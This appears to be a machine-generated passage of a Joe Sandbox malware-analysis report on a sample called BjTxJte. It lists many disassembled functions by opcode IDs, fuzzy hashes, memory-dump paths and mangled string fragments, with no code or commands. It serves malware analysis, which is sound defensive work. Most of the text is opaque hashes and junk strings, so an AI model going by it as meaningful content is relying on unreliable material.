                                                                                      • Opcode ID: 91b33e84e5c166ad09d880130722cb0bfd4e8c04f9536d73e8574e3378552b55
                                                                                      • Instruction ID: e053d33338246927dcb0b6d7b6e95cf82bff77bbce3fe785c8fc44c7b3b7b366
                                                                                      • Opcode Fuzzy Hash: 91b33e84e5c166ad09d880130722cb0bfd4e8c04f9536d73e8574e3378552b55
                                                                                      • Instruction Fuzzy Hash: 77119278A08208DFDB48DFA4D050AECBBB5FF49302F2091A9E80997351CB35D946CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee968e8464f3d7dd8116b06cfc826c665bc4f948e3925c150b9ef38c0ee527f3
                                                                                      • Instruction ID: a458c6437dc8d0f352fe42b167087436fb0c8cb020c2183dd1e1a88c992cf016
                                                                                      • Opcode Fuzzy Hash: ee968e8464f3d7dd8116b06cfc826c665bc4f948e3925c150b9ef38c0ee527f3
                                                                                      • Instruction Fuzzy Hash: C011FA74D08208EFDB84EFA9C5909ADBBF9FB4C311F119599D809AB311DB30AA418F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac71d1ec8d3ea60767b7f85555bd05299c956bdb1bc35a3b89fc54ccc104474b
                                                                                      • Instruction ID: 71d1d054eaaecf90d86ee86815d9e051bbd55f6af3fd58268e32a668c659570e
                                                                                      • Opcode Fuzzy Hash: ac71d1ec8d3ea60767b7f85555bd05299c956bdb1bc35a3b89fc54ccc104474b
                                                                                      • Instruction Fuzzy Hash: 0C117C75E48218CFDB90EB58D880BDCBBBAFB49300F11A5E9D90D9B252DB300E858F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dff5707493a7d1f6a98b5bb36607ca0017b5ff8404b8f5d5604eaf792f2847b
                                                                                      • Instruction ID: 24f3f8875ac306537ba51dc7da13085567503501232f579ed89be97f0ea45343
                                                                                      • Opcode Fuzzy Hash: 9dff5707493a7d1f6a98b5bb36607ca0017b5ff8404b8f5d5604eaf792f2847b
                                                                                      • Instruction Fuzzy Hash: 8611B0B1E006188BEB18CFABD9457DEFAF6AFC8310F14C16AD80976264DB7509458FA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c132b03ba6d9c50b6f1ff0192c2af8fe86012996af495040d4e3a33ebc58f83
                                                                                      • Instruction ID: f6840fcaba64bde59240350d5c6a14b3083c76581c973d0324b55ca378514f5a
                                                                                      • Opcode Fuzzy Hash: 3c132b03ba6d9c50b6f1ff0192c2af8fe86012996af495040d4e3a33ebc58f83
                                                                                      • Instruction Fuzzy Hash: 5001A2750093409AE7208E2ACD84B67BFDCEF41324F18C53EED494A296C67DAC40CAB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e53e45b625ec3d36da50b08493650438ab190a1e4117fa49909c5c4df8856f9
                                                                                      • Instruction ID: 0427ca1b8c1862707bfcef2040bc772df1634e4dea0ed4ecae4861d89920051f
                                                                                      • Opcode Fuzzy Hash: 1e53e45b625ec3d36da50b08493650438ab190a1e4117fa49909c5c4df8856f9
                                                                                      • Instruction Fuzzy Hash: E501D234608244CFC741DBA8DA44AADBFF5EF4A310B19D1C8E84A9B367C7308E04DB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dee82a88fe57d502f2998bd00c1a41bcc9122ef478f9f661b642c81e94bb36e
                                                                                      • Instruction ID: ed3af9c83e6648823b56f47a7f626fd1b8270eed9a5fdbdd07e6c651b0007c2e
                                                                                      • Opcode Fuzzy Hash: 0dee82a88fe57d502f2998bd00c1a41bcc9122ef478f9f661b642c81e94bb36e
                                                                                      • Instruction Fuzzy Hash: 6B01ADB9D14205CFDB84EFA9E5456ADBBF4FB083117267460F806D7242EB30EE42CA54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a277fe194171cb72029ab0a6990a2c2df95a04700a60ab9589b0a283215b11c8
                                                                                      • Instruction ID: 46b0cb0a32af39eedcbfdffd2baaad795628b5124fb586bbcb70cb63af0d6881
                                                                                      • Opcode Fuzzy Hash: a277fe194171cb72029ab0a6990a2c2df95a04700a60ab9589b0a283215b11c8
                                                                                      • Instruction Fuzzy Hash: CB010878E09208EFDB48DFA5D0509ECBBB9EF49302F2091A9E80597351CB31DA45CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e63fe5b3453c8f4d0a46232e745ea533e0723f19bc67048719c64394c38ba25
                                                                                      • Instruction ID: 17889e133abe975590a7eb0a64a3e19b796dd466a2bdb4da0e13ea9069b14e26
                                                                                      • Opcode Fuzzy Hash: 4e63fe5b3453c8f4d0a46232e745ea533e0723f19bc67048719c64394c38ba25
                                                                                      • Instruction Fuzzy Hash: 0D01D67094C305DFD344DF56C6009E9BBF9EF59324F05D199E80E8B226DB348A49CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 53ff691c66e6ce9679d506f75562cbd27194752e81bfa43d8408ef7f14dd5d90
                                                                                      • Instruction ID: 74d5d7436ca96f7ceeb5a208f609cefa4cf389101e62737713faaf0030d3209f
                                                                                      • Opcode Fuzzy Hash: 53ff691c66e6ce9679d506f75562cbd27194752e81bfa43d8408ef7f14dd5d90
                                                                                      • Instruction Fuzzy Hash: 93017C75D0820ACFEB80FFA5D8487AEBBF1FB45300F018966D811A7354DB798686CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fd46a850ff6c4a25d0610f35da8f18963fdbbbc1f751bd823d328f17aa902bd
                                                                                      • Instruction ID: 1c468fa6d54c1ac2370e0d1c03bbaf402012e42ce685e4b74a8e85210cad9357
                                                                                      • Opcode Fuzzy Hash: 4fd46a850ff6c4a25d0610f35da8f18963fdbbbc1f751bd823d328f17aa902bd
                                                                                      • Instruction Fuzzy Hash: AA01EC74A04208DFD744EFA9C685AADFBF5EF49310F25D498A8099B355D730DE04DB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dfa6e87808758bda3380603d1ffbe7d740023e5dc81e0daaee63215cca9f8ae
                                                                                      • Instruction ID: 51c02b931ea4d69cc8dab5b194e84aa2980f01735a9c079cf72a6b1924a87e04
                                                                                      • Opcode Fuzzy Hash: 9dfa6e87808758bda3380603d1ffbe7d740023e5dc81e0daaee63215cca9f8ae
                                                                                      • Instruction Fuzzy Hash: 6B01BC34F09258CFDB50DBA49990AE9BBB5FB06300F0652EAC5499B213C7300A84CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b5fe0dec0a8edb9afd1256f89e59f5ba92b92751ce717b4b433279d5e7da74e
                                                                                      • Instruction ID: b6801c159b7020b57b3aba5c1634f2656ca118c2abfe5d2d395be47bdb6a3071
                                                                                      • Opcode Fuzzy Hash: 8b5fe0dec0a8edb9afd1256f89e59f5ba92b92751ce717b4b433279d5e7da74e
                                                                                      • Instruction Fuzzy Hash: 1111F778D04209CFCBA5FF64DC546ADBBB2FBC8204F208569D546D7315DA308D468F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5eb6171b0001747e4803dfa01f7339c53d85f764a16b170a6e742323e0a42f1f
                                                                                      • Instruction ID: 862e7cd5779da63368830ea4268b4f424e2027c76b6933859d392b0f365751b5
                                                                                      • Opcode Fuzzy Hash: 5eb6171b0001747e4803dfa01f7339c53d85f764a16b170a6e742323e0a42f1f
                                                                                      • Instruction Fuzzy Hash: B9F04F70909308DFD744EF56D6409BDBBB8AF59310F11E1A9E80E5B219DB309A48DBC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1932fae67e85287fcc8b4e0fa38bae4bea346135db835b67238af3142f232f83
                                                                                      • Instruction ID: e9c73e1e6e7c634a2fa6014a8628f3d735e687a9acf38547ebe9b11a68cf5e14
                                                                                      • Opcode Fuzzy Hash: 1932fae67e85287fcc8b4e0fa38bae4bea346135db835b67238af3142f232f83
                                                                                      • Instruction Fuzzy Hash: E0F05E727001145BD3049A6ADCC4E6BBBE9EBC86B0715817AE508C7311C934DC0182A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01451a8e16485177bb5f214e83d1d787f13c46d8f05b8cc66e2c1bfa53fec2a3
                                                                                      • Instruction ID: 094cb5e440d9ae31e308b4f2602cba57bac1105e0767f1205841d75b0c1700a8
                                                                                      • Opcode Fuzzy Hash: 01451a8e16485177bb5f214e83d1d787f13c46d8f05b8cc66e2c1bfa53fec2a3
                                                                                      • Instruction Fuzzy Hash: 35C01279904244CFD7118A00D800A99BF31EB49100F105185A81656213CA305D90CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 661bb21406e694832aedd7e181e47191c26e06b3a21f19e62ee240fbab957791
                                                                                      • Instruction ID: 0bfc03e348a3d0efba5e0b2575156532ff7fa96dced97a4603c516c82613b85f
                                                                                      • Opcode Fuzzy Hash: 661bb21406e694832aedd7e181e47191c26e06b3a21f19e62ee240fbab957791
                                                                                      • Instruction Fuzzy Hash: 73B014D714010057D1C17750CD0574FD511D771750F7770117D55D1551D13DC471D711
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$[V~*$]\`
                                                                                      • API String ID: 0-1849991408
                                                                                      • Opcode ID: 6cbad7acc502f9ec8b0b9fda84a50b0623acf3691e4a1676bad1a810e931d654
                                                                                      • Instruction ID: 3b9aac0d1573650dc576ae7efde2f994db919dc2e54c693b34de8a7e2ed2f16e
                                                                                      • Opcode Fuzzy Hash: 6cbad7acc502f9ec8b0b9fda84a50b0623acf3691e4a1676bad1a810e931d654
                                                                                      • Instruction Fuzzy Hash: E0B10670E152299FDB44EFAAD98089EFBF2FF98300B15D52AD816BB218D7349901CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:25
                                                                                      Total number of Limit Nodes:6
                                                                                      execution_graph: node and edge listing omitted; API calls named in the graph: GlobalMemoryStatusEx (node 682fca9)

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: c5614cc86c01a8abe0af70650b0c5d2d5e19f2fdfeb975ca973bb48e155e5264
                                                                                      • Instruction ID: 2a53e3d2dae05d143f3ad6293db72d18ac81701cc0d1a7d5935121f5a6c39790
                                                                                      • Opcode Fuzzy Hash: c5614cc86c01a8abe0af70650b0c5d2d5e19f2fdfeb975ca973bb48e155e5264
                                                                                      • Instruction Fuzzy Hash: 46321E31E1071ACFCB15EF75D89459DF7B6BF89300F1086AAD409AB264EB30A9C5CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 2242b878b4ab25a3c2314b3e3b63d8c8373ec3ce817065dadd76852828c7418d
                                                                                      • Instruction ID: ed83d43de82c8662f3b0ac94caa8b2e34f9ca9a7e6fcaaac2bc669b215418c32
                                                                                      • Opcode Fuzzy Hash: 2242b878b4ab25a3c2314b3e3b63d8c8373ec3ce817065dadd76852828c7418d
                                                                                      • Instruction Fuzzy Hash: 1C02AC71B0022A9FDF54EB64D490AAEB7E2FF88304F148529D505DB394DB31EC8ACB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      • Opcode ID: a90fa56207c26b8062acbe26e08bb943de70efea7d48a4c6c95b5b87f6bfd1ac
                                                                                      • Instruction ID: e55bd259cfa9f63c3bbb2385918903fc17f0ba90155b934d17cd65a9cc2ea54b
                                                                                      • Opcode Fuzzy Hash: a90fa56207c26b8062acbe26e08bb943de70efea7d48a4c6c95b5b87f6bfd1ac
                                                                                      • Instruction Fuzzy Hash: 5322E571E402268FDF64DFA4C4946AEB7B2EF84324F208469D559EB344DB31DC85CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79ac53b1d21d2803ad022f4290258735a2cca991898aaad4580238e31a4a0bc5
                                                                                      • Instruction ID: 65bdf5563d805aa0cd675c08ca9485948cb6bdfe94c7af1034bda15da6a5d3d8
                                                                                      • Opcode Fuzzy Hash: 79ac53b1d21d2803ad022f4290258735a2cca991898aaad4580238e31a4a0bc5
                                                                                      • Instruction Fuzzy Hash: 7D62BF34A0021A9FDF54EB68D590AADB7F2EF84314F148469E506DB394EB35ECC6CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19fab2f22dd0a284c8f16a8d8da21da5d27d2bccb65329d670484d983d5b9964
                                                                                      • Instruction ID: 4f6c074b57c728fbc168f41cc2f2c71ec928d781cd0e5ca3dbe794369f129218
                                                                                      • Opcode Fuzzy Hash: 19fab2f22dd0a284c8f16a8d8da21da5d27d2bccb65329d670484d983d5b9964
                                                                                      • Instruction Fuzzy Hash: C3329071B1021A8FDF94DB68D990ABEB7B2FB88310F108529D505EB355DB35EC82CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9594b62b764782742548de3ddc37f8d34698dcae63daa97fed38c7e877b866e
                                                                                      • Instruction ID: aa7d33526513c2d92c1509b615650b03ac6ab4398cc42001115a00f780d0e928
                                                                                      • Opcode Fuzzy Hash: e9594b62b764782742548de3ddc37f8d34698dcae63daa97fed38c7e877b866e
                                                                                      • Instruction Fuzzy Hash: 85226F70E1121A8FDF64DB68D5807ADB7F2EB89318F208826E509EB395DA35DCC1CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 29228c934bb17e1717245433f23c198ec5bd6aaf226c5d65df3d835928db6b83
                                                                                      • Instruction ID: 388b9b355a175dbaee1041bab22af56b8c1c20916b4c35a6f04244e1b3f66862
                                                                                      • Opcode Fuzzy Hash: 29228c934bb17e1717245433f23c198ec5bd6aaf226c5d65df3d835928db6b83
                                                                                      • Instruction Fuzzy Hash: DDE15E70E1021A8FDB69DF68D8806AEB7B2FF85304F108529D505EB358DB75EC86CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 5f566d9e1ab7674d71682838af711388fa7c5ae48634dc763067d66b72c16dfe
                                                                                      • Instruction ID: 605a85d35ce0ef0567c0cef12696586da6c3bb56dbb7d56217db8616f57c6978
                                                                                      • Opcode Fuzzy Hash: 5f566d9e1ab7674d71682838af711388fa7c5ae48634dc763067d66b72c16dfe
                                                                                      • Instruction Fuzzy Hash: 18915230F1021A9FDF54DB65D8907AEB7F6AFC9204F148569C409EB344EF70AC868B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: 8196418b7b8dc82661cb39652514286f767d30f7c41a03d3594b9a611d6256b9
                                                                                      • Instruction ID: 6ee7b9b79794779dc8baa7cdb82cf529bde68eb0311b068ec2468a8bd0aaf6d1
                                                                                      • Opcode Fuzzy Hash: 8196418b7b8dc82661cb39652514286f767d30f7c41a03d3594b9a611d6256b9
                                                                                      • Instruction Fuzzy Hash: 24622E31A102168FCB55EB68D590A5EB7F2FF84304F148A69D059DF369DB71EC86CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: c157ce4aac0f563ae4819dbd2622ab832c0783456a301f85cc7769e977976132
                                                                                      • Instruction ID: eab06371887f18d1950a62d81a2ac33244a8be3f0caaba706ff9a9c5605d6405
                                                                                      • Opcode Fuzzy Hash: c157ce4aac0f563ae4819dbd2622ab832c0783456a301f85cc7769e977976132
                                                                                      • Instruction Fuzzy Hash: E4618070F002199FEF549FA5C8547AEBBF2FB88710F20842AD11AEB394DB758C458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: d23aecc5e98cad8871c1d253d509608a332c7cb625b785ab86467482dbc202c4
                                                                                      • Instruction ID: 4bb12dcb492494f9557035a642bf59c48d3d6f2813812a0b309201f8d1bf8401
                                                                                      • Opcode Fuzzy Hash: d23aecc5e98cad8871c1d253d509608a332c7cb625b785ab86467482dbc202c4
                                                                                      • Instruction Fuzzy Hash: 87516530F041169FDF54EB75D890B6EB7FAABC9644F14856AC509DB384DA30EC82CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 6721bf61931c4af0b2fe316ef96cfc119a6da477651af904c8e5bedb66537d9f
                                                                                      • Instruction ID: 0d6d6e774aef9af85f41879fe30bcdfe33ee813d76fa064fd67ac80e31f7cd11
                                                                                      • Opcode Fuzzy Hash: 6721bf61931c4af0b2fe316ef96cfc119a6da477651af904c8e5bedb66537d9f
                                                                                      • Instruction Fuzzy Hash: 09517D30F102199FDB559FA9C854BAEBBF7FB88710F20852AD106EB394DA758C418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

